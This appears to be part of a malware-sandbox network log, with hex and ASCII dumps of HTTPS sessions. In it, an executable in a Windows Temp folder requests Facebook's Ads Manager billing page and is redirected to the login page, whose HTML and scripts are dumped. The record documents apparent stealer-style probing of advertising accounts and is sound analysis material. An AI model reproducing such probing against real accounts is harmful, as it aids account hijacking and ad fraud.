                                                                                    2023-02-07 18:46:27 UTC1510INData Raw: 31 32 38 39 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 30 55 6a 45 63 4b 36 64 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 30 55 6a 45 63 4b 36 64 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41
                                                                                    Data Ascii: 1289<script nonce="0UjEcK6d">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="0UjEcK6d">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletA
                                                                                    2023-02-07 18:46:27 UTC1511INData Raw: 37 4e 67 61 35 76 6e 48 36 39 5f 44 57 51 64 6b 2d 38 51 61 4f 70 72 32 62 6e 79 56 38 46 63 41 41 46 32 4a 4d 41 33 62 45 4f 4d 5f 2d 34 2d 79 71 52 6f 54 65 78 67 4b 78 7a 79 62 49 79 59 41 46 32 39 4e 64 31 6b 74 66 34 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 33 46 79 79 7a 64 46 6f 72 4d 38 36 5a 37 68 37 4e 67 61 35 76 6e 48 36 39 5f 44 57 51 64 6b 2d 38 51 61 4f 70 72 32 62 6e 79 56 38 46 63 41 41 46 32 4a 4d 41 33 62 45 4f 4d 5f 2d 34 2d 79 71 52 6f 54 65 78 67 4b 78 7a 79 62 49 79 59 41 46 32 39 4e 64 31 6b 74 66 34 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b
                                                                                    Data Ascii: 7Nga5vnH69_DWQdk-8QaOpr2bnyV8FcAAF2JMA3bEOM_-4-yqRoTexgKxzybIyYAF29Nd1ktf4"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa3FyyzdForM86Z7h7Nga5vnH69_DWQdk-8QaOpr2bnyV8FcAAF2JMA3bEOM_-4-yqRoTexgKxzybIyYAF29Nd1ktf4"]},-1],["cr:1083117",[],{
                                                                                    2023-02-07 18:46:27 UTC1513INData Raw: 51 6f 64 51 58 65 56 4f 35 39 68 7a 6e 34 50 78 69 72 6a 38 4e 73 46 31 68 67 74 4b 4b 54 63 42 4c 36 5a 76 36 44 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65
                                                                                    Data Ascii: QodQXeVO59hzn4Pxirj8NsF1hgtKKTcBL6Zv6Dg"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_e
                                                                                    2023-02-07 18:46:27 UTC1514INData Raw: 65 6f 4d 53 4b 72 6a 53 43 77 79 51 6f 64 51 58 65 56 4f 35 39 68 7a 6e 34 50 78 69 72 6a 38 4e 73 46 31 68 67 74 4b 4b 54 63 42 4c 36 5a 76 36 44 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 30 69 65 35 75 34 4b 4a 64 33 63 56 50 55 34 76 50 46 62 55 77 6a 58 4e 37 32 32 70 78 52 65 6f 4d 53 4b 72 6a 53 43 77 79 51 6f 64 51 58 65 56 4f 35 39 68 7a 6e 34 50 78 69 72 6a 38 4e 73 46 31 68 67 74 4b 4b 54 63 42 4c 36 5a 76 36 44 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 35 32 37 38 22 2c 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 2c 22 41 61 31 4d 64 0d 0a 61 61
                                                                                    Data Ascii: eoMSKrjSCwyQodQXeVO59hzn4Pxirj8NsF1hgtKKTcBL6Zv6Dg"]},-1],["cr:983844",[],{__rc:[null,"Aa0ie5u4KJd3cVPU4vPFbUwjXN722pxReoMSKrjSCwyQodQXeVO59hzn4Pxirj8NsF1hgtKKTcBL6Zv6Dg"]},-1],["cr:5278",["ReactDOM-prod.classic"],{__rc:["ReactDOM-prod.classic","Aa1Mdaa
                                                                                    2023-02-07 18:46:27 UTC1516INData Raw: 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22 4e 61 76 69 67 61 74 69 6f 6e 4d 65 74 72 69 63 73 22 2c 22 73 65 74 50 61 67 65 22 2c 5b 5d 2c 5b 7b 70 61 67 65 3a 22 2f 6c 6f 67 69 6e 2e 70 68 70 22 2c 70 61 67 65 5f 74 79 70 65 3a 22 6e 6f 72 6d 61 6c 22 2c 70 61 67 65 5f 75 72 69 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 2c 73 65 72 76 65 72 4c 49 44 3a
                                                                                    Data Ascii: ,[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    21192.168.2.349780157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:36 UTC1517OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:46:36 UTC1518INHTTP/1.1 302 Found
                                                                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                    x-fb-rlafr: 0
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-resource-policy: same-origin
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: FYC2NAqRR03ztuagrEPRNtM+3om7V7JaoHCeoUubjDh6zla85gJSZn8AUMEgrA69tGni7Z6Wj1KIuQ5DU7+SNg==
                                                                                    2023-02-07 18:46:36 UTC1520INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 30 37 20 46 65 62 20 32 30 32 33 20 31 38 3a 34 36 3a 33 36 20 47 4d 54 0d 0a 50 72 69 6f 72 69 74 79 3a 20 75 3d 33 2c 69 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d 0a
                                                                                    Data Ascii: Date: Tue, 07 Feb 2023 18:46:36 GMTPriority: u=3,iAlt-Svc: h3=":443"; ma=86400Connection: closeContent-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    22192.168.2.349782157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:36 UTC1520OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:46:36 UTC1521INHTTP/1.1 200 OK
                                                                                    Vary: Accept-Encoding
                                                                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                                                                    x-fb-rlafr: 0
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: rkwdsASHiJvF9U29dOzPzADJyvvNCVEkAiN5EjyGF6zDzdtguGOp1eNazlsYA6KiPWA6JK420jJsk6euDNodZA==
                                                                                    2023-02-07 18:46:36 UTC1523INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 30 37 20 46 65 62 20 32 30 32 33 20 31 38 3a 34 36 3a 33 36 20 47 4d 54 0d 0a 50 72 69 6f 72 69 74 79 3a 20 75 3d 33 2c 69 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                    Data Ascii: Date: Tue, 07 Feb 2023 18:46:36 GMTPriority: u=3,iTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400Connection: close
                                                                                    2023-02-07 18:46:36 UTC1523INData Raw: 38 61 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 62 74 76 44 66 42 31 32 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                    Data Ascii: 8afc<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                    2023-02-07 18:46:36 UTC1524INData Raw: 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4c 6f 67 20 69 6e 20 6f 72 20 73 69 67 6e 20 75 70 20 74 6f 20 76 69 65 77 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 70 6f 73 74 73 2c 20 70 68 6f 74 6f 73 20 61 6e 64 20 6d 6f 72 65 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 79 76 2f 72 2f 42 38 42 78 73
                                                                                    Data Ascii: /www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8Bxs
                                                                                    2023-02-07 18:46:36 UTC1526INData Raw: 72 4a 74 4c 56 4d 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 76 36 59 65 42 69 45 22 20 6e 6f 6e 63 65 3d 22 62 74 76 44 66 42 31 32 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 62 74 76 44 66 42 31 32 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 63 6c 70 44 61 74 61 22 3a 7b 22 31 38 31 34 38 35 32 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 33 38 31 34 32 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 2c 22 31 39 34 39 38 39 38 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 34 38 38 31 35 22 3a 7b 22 72 22 3a 31
                                                                                    Data Ascii: rJtLVMo.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="v6YeBiE" nonce="btvDfB12"></script><script nonce="btvDfB12">requireLazy(["HasteSupportData"],function(m){m.handle({"clpData":{"1814852":{"r":1},"1838142":{"r":1,"s":1},"1949898":{"r":1},"1848815":{"r":1
                                                                                    2023-02-07 18:46:36 UTC1527INData Raw: 6e 6f 6e 63 65 22 2c 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 2c 22 6f 61 75 74 68 5f 74 6f 6b 65 6e 22 2c 22 78 73 22 2c 22 63 68 65 63 6b 70 6f 69 6e 74 5f 64 61 74 61 22 2c 22 63 6f 64 65 22 5d 7d 2c 31 33 37 5d 2c 5b 22 43 6f 6d 65 74 50 65 72 73 69 73 74 51 75 65 72 79 50 61 72 61 6d 73 22 2c 5b 5d 2c 7b 22 72 65 6c 61 74 69 76 65 22 3a 7b 7d 2c 22 64 6f 6d 61 69 6e 22 3a 7b 7d 7d 2c 36 32 33 31 5d 2c 5b 22 43 6f 6f 6b 69 65 44 6f 6d 61 69 6e 22 2c 5b 5d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 22 7d 2c 36 34 32 31 5d 2c 5b 22 43 75 72 72 65 6e 74 41 64 41 63 63 6f 75 6e 74 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 22 41 44 5f 41 43 43 4f 55 4e 54 5f 49 44 22 3a 6e 75 6c 6c 7d 2c 36 38 32 38 5d 2c 5b 22 42 6f
                                                                                    Data Ascii: nonce","access_token","oauth_token","xs","checkpoint_data","code"]},137],["CometPersistQueryParams",[],{"relative":{},"domain":{}},6231],["CookieDomain",[],{"domain":"facebook.com"},6421],["CurrentAdAccountInitialData",[],{"AD_ACCOUNT_ID":null},6828],["Bo
                                                                                    2023-02-07 18:46:36 UTC1529INData Raw: 2c 22 48 41 53 5f 53 45 43 4f 4e 44 41 52 59 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 46 41 43 45 42 4f 4f 4b 5f 57 4f 52 4b 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 4f 4e 4c 59 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 44 45 41 43 54 49 56 41 54 45 44 5f 41 4c 4c 4f 57 45 44 5f 4f 4e 5f 4d 45 53 53 45 4e 47 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 43 41 4c 4c 5f 47 55 45 53 54 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 57 4f 52 4b 5f 4d 45 53 53 45 4e 47 45 52 5f 43 41 4c 4c 5f 47 55 45 53 54 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 57 4f 52 4b 52 4f 4f 4d 53 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 41 50
                                                                                    Data Ascii: ,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_WORK_ACCOUNT":false,"IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false,"IS_MESSENGER_CALL_GUEST_USER":false,"IS_WORK_MESSENGER_CALL_GUEST_USER":false,"IS_WORKROOMS_USER":false,"AP
                                                                                    2023-02-07 18:46:36 UTC1530INData Raw: 61 74 66 6f 72 6d 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 7d 2c 35 32 37 5d 2c 5b 22 50 72 6f 6d 69 73 65 55 73 65 50 6f 6c 79 66 69 6c 6c 53 65 74 49 6d 6d 65 64 69 61 74 65 47 4b 22 2c 5b 5d 2c 7b 22 77 77 77 5f 61 6c 77 61 79 73 5f 75 73 65 5f 70 6f 6c 79 66 69 6c 6c 5f 73 65 74 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 7d 2c 32 31 39 30 5d 2c 5b 22 4b 53 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6b 69 6c 6c 65 64 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 4d 4c 48 55 42 5f 46 4c 4f 57 5f 41 55 54 4f 52 45 46 52 45 53 48 5f 53 45 41 52 43 48 22 2c 22 4e 45 4b 4f 5f 44 49 53 41 42 4c 45 5f 43 52 45 41 54 45 5f 46 4f 52 5f 53 41 50 22 2c 22 45 4f 5f 44 49 53 41 42 4c 45 5f 53 59 53 54 45 4d 5f 53 45 52 49 41 4c 5f 4e 55 4d 42 45 52 5f 46 52 45
                                                                                    Data Ascii: atformFullVersion":"10"},527],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["KSConfig",[],{"killed":{"__set":["MLHUB_FLOW_AUTOREFRESH_SEARCH","NEKO_DISABLE_CREATE_FOR_SAP","EO_DISABLE_SYSTEM_SERIAL_NUMBER_FRE
                                                                                    2023-02-07 18:46:36 UTC1532INData Raw: 44 31 39 5f 42 41 4e 4e 45 52 22 5d 7d 2c 22 6b 6f 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 33 4f 73 4c 76 6e 53 48 4e 54 74 22 2c 22 31 47 37 77 4a 36 62 4a 74 39 4b 22 2c 22 39 4e 70 6b 47 59 77 7a 72 50 47 22 2c 22 33 6f 68 35 4d 77 38 36 55 53 6a 22 2c 22 38 4e 41 63 65 45 79 39 4a 5a 6f 22 2c 22 37 46 4f 49 7a 6f 73 36 58 4a 58 22 2c 22 72 66 38 4a 45 50 47 67 4f 69 22 2c 22 34 6a 33 36 53 56 7a 76 50 33 77 22 2c 22 34 4e 53 71 33 5a 43 34 53 63 45 22 2c 22 35 33 67 43 78 4b 71 32 38 31 47 22 2c 22 33 79 7a 7a 77 42 59 37 4e 70 6a 22 2c 22 31 6f 6e 7a 49 76 30 6a 48 36 48 22 2c 22 38 50 6c 4b 75 6f 77 61 66 65 38 22 2c 22 31 6e 74 6a 5a 32 7a 67 66 30 33 22 2c 22 34 53 49 48 32 47 52 56 58 35 57 22 2c 22 32 64 68 71 52 6e 71 58 47 4c 51 22 2c 22 32 57
                                                                                    Data Ascii: D19_BANNER"]},"ko":{"__set":["3OsLvnSHNTt","1G7wJ6bJt9K","9NpkGYwzrPG","3oh5Mw86USj","8NAceEy9JZo","7FOIzos6XJX","rf8JEPGgOi","4j36SVzvP3w","4NSq3ZC4ScE","53gCxKq281G","3yzzwBY7Npj","1onzIv0jH6H","8PlKuowafe8","1ntjZ2zgf03","4SIH2GRVX5W","2dhqRnqXGLQ","2W
                                                                                    2023-02-07 18:46:36 UTC1533INData Raw: 5d 2c 5b 22 57 65 62 43 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 53 65 72 76 65 72 47 75 65 73 73 22 2c 5b 5d 2c 7b 22 63 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 22 3a 22 45 58 43 45 4c 4c 45 4e 54 22 7d 2c 34 37 30 35 5d 2c 5b 22 43 6f 6d 65 74 41 6c 74 70 61 79 4a 73 53 64 6b 49 66 72 61 6d 65 41 6c 6c 6f 77 65 64 44 6f 6d 61 69 6e 73 22 2c 5b 5d 2c 7b 22 61 6c 6c 6f 77 65 64 5f 64 6f 6d 61 69 6e 73 22 3a 5b 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 69 76 65 2e 61 64 79 65 6e 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 6e 74 65 67 72 61 74 69 6f 6e 2d 66 61 63 65 62 6f 6f 6b 2e 70 61 79 75 2e 69 6e 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 61 63 65 62 6f 6f 6b 2e 70 61 79 75 6c 61 74 61 6d 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 65
